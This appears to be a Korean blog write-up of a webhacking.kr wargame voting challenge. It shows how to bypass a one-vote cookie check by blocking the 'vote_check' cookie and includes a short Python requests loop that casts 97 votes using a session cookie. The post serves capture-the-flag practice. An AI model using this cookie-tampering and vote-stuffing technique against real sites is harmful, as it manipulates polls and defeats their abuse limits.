✏️ Check
클릭하면 점수가 1 오르고, 투표는 한 번밖에 할 수 없다.
문제에 대한 별도의 description이 없어서 뭘 해야하는지 아직은 잘 모르겠지만, 일단 나를 최대한 높이 올리는 걸 시도해보려고 한다.
🔎 Analyze
클릭한 닉네임이 hit 변수의 값에 저장되어 전달되는 것을 확인할 수 있었다.
한 번 더 확인해보기 위해 클릭하지 않고 '?hit='를 이용했더니 동일하게 투표되는 것을 확인했다.
그리고 투표를 한 것은 cookie 값을 통해 체크하는 것을 확인할 수 있다.
vote_check의 값이 'ok'만 아니게 된다면 계속해서 투표를 할 수 있을 것이다.
EditThisCookie에서 vote_check에 대하여 특정 값('ok')를 차단할 수 있도록 규칙을 추가한다.
더보기
#!/usr/bin/python3
import requests
url = 'https://webhacking.kr/challenge/code-5/'
cookie = {
'PHPSESSID':'1t08od0u5l4hrq33hqjk9j62av',
}
param={
'hit': 'elasjay'
}
for _ in range(97):
req = requests.get(url, params=param, cookies=cookie)🔓 Exploit
SMALL
'Web > Web Hacking (Wargame)' 카테고리의 다른 글
| [webhacking.kr] old-33 (0) | 2023.02.04 |
|---|---|
| [Dreamhack] out of money (0) | 2023.02.04 |
| [hackthissite/Javascript] Mission 1 ~ Mission 7 (1) | 2023.01.30 |
| [webhacking.kr] old-17 (0) | 2023.01.29 |
| [webhacking.kr] old-16 (0) | 2023.01.29 |